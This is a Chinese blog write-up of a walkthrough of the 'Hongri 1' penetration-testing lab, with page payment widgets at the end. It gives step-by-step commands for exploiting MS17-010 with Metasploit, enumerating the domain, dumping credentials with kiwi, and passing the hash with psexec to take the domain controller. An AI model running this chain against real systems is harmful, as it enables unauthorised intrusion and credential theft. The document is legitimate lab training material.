红日1靶场速通记录

环境搭建网上有很多,此文章直接忽略此步。

kali 192.168.3.3
win7 192.168.3.31

fscan

fscan.exe -h 192.168.3.31

在这里插入图片描述
发现存在MS17-010漏洞

MSF

使用MSF的MS17-010攻击模块进行攻击上线

use windows/smb/ms17_010_eternalblue
set RHOST 192.168.3.31 

在这里插入图片描述
不成功就多run几次

成功后执行shell获取交互式shell,然后执行ipconfig
在这里插入图片描述发现存在192.168.52.143,猜测在内网中

内网信息收集

在MSF的交互式shell中执行:

ipconfig /all

在这里插入图片描述
说明该主机处在god.org域中,该主机名为stu1
出现乱码,执行chcp 65001

查看在几个域中

net view /domain

在这里插入图片描述

查看域内主机

net view

在这里插入图片描述

定位域控,这里使用查看管理员名字来找域控主机名

net group "domain admins" /domain

在这里插入图片描述
域控主机的主机名是OWA,接着找域控的IP

ping owa.god.org

在这里插入图片描述
得到域控的IP是192.168.52.138

接着上代理

设置代理

上传frp -----缺.dll跑不起来
直接VSHELL上线设置代理

尝试MS-010

添加路由

route add 192.168.52.0 255.255.255.0 2

检测MS17-010

use scanner/smb/smb_ms17_010
set RHOST 192.168.52.138

在这里插入图片描述
利用

use windows/smb/ms17_010_eternalblue
set RHOST 192.168.52.138

等很久没反应,换一种方法

PTH攻击

load kiwi
creds_all

在这里插入图片描述
得到hash:47bf8039a8506cd67c524a03ff84ba4e

使用psexec进行横向

proxychains python3 psexec.py -hashes :47bf8039a8506cd67c524a03ff84ba4e administrator@192.168.52.138 cmd

在这里插入图片描述
成功拿下域控

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值